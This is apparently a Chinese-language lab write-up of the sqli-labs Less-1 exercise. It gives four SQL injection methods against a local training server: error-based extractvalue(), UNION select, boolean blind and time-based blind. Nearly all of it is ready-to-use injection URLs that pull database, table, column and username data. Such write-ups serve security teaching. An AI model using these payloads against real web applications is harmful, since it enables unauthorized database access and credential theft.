sqli-labs_less_1

发表于 | 分类于
字数统计: 748

方法一:报错注入extractvalue()

判断注入点:
输入单引号,发现页面报错 http://172.16.173.131/sqli-labs/Less-1/?id=1'

闭合前一个单引号,注释掉后一个,并加入判断payload
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+

所以利用extractvalue()报错注入
先判断函数是否可执行
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,md5(123));--+

获取version()、database()、user()等信息
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,database()));--+

获取表名:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)));--+

获取users的列名
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)));--+

获取每列(id、username、password)的内容
http://172.16.173.131/sqli-labs/Less-1/?id=1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1)));--+

方法二:联合注入

判断注入点:
输入单引号,发现页面报错 http://172.16.173.131/sqli-labs/Less-1/?id=1'

order by 判断有几列
http://172.16.173.131/sqli-labs/Less-1/?id=1' order by 3--+
union select 联合注入
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,22,33--+

判断数据库名称:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,database(),33--+

获取security的表名:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),33--+

获取列名:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),33--+

获取每列(id、username、password)的内容:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=2 union select 11,concat(0x7e,(select username from security.users limit 1,1)),33--+

方法3:回显布尔注入(ascii逐位判断)

判断注入点:
输入单引号,发现页面报错 http://172.16.173.131/sqli-labs/Less-1/?id=1' http://172.16.173.131/sqli-labs/Less-1/?id=1' and 1=1--+
获取数据库名:
利用ascii逐位判断,更改substr()第二参数1~n
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr(database(),1,1))=115--+
获取表名(emails\referers\uagents\users):
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+
获取users列名:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105--+
获取每列(id、username、password)的内容
http://172.16.173.131/sqli-labs/Less-1/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))>65--+

方法4:时间盲注(sleep()、if())

if((条件),m,n)语句:若条件为真 返回m,若条件为假 返回n;
获取数据库名:
http://172.16.173.131/sqli-labs/Less-1/?id=1' and sleep(if((ascii(substr(database(),1,1))=115),5,0))--+